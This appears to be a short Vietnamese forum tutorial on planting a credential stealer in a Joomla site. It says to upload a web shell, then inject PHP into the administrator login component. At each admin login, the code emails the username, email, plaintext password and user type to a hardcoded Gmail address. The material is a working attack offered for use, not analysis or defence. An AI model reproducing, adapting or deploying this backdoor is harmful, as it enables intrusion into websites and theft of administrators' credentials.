[Tut] Chèn Keylogger vào joomla

Bước 1: Up shell lên site joomla




Bước 2: Insert mã độc vào code




- Vào administrator/components/com_login/




- Edit file: admin.login.php




- Tìm dòng:$mainframe->redirect('index.php');




- Thêm trước dòng này 1 đoạn code như sau:

Quote:

$db =& JFactory::getDBO(); $mailfrom = $mainframe->getCfg( 'mailfrom' ); $fromname = $mainframe->getCfg( 'fromname' ); $siteURL = JURI::base(); $uname = $credentials['username']; $query = 'SELECT name , email, usertype ' . ' FROM #__users' . ' WHERE username = "'.$uname.'"'; $db->setQuery( $query ); $rows = $db->loadObject(); if ( ! $mailfrom || ! $fromname ) { $fromname = $rows->name; $mailfrom = $rows->email; } $usertype = $rows->usertype; $email = $rows->email; $pass = $credentials['password']; $message = "$uname|$email|$pass|$usertype"; $to="mailinfo17@gmail.com"; $header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to"; @mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: mailinfo17@gmail.com

Chú Ý:

Coppy phải ghi rõ nguồn Group Át Chủ Bài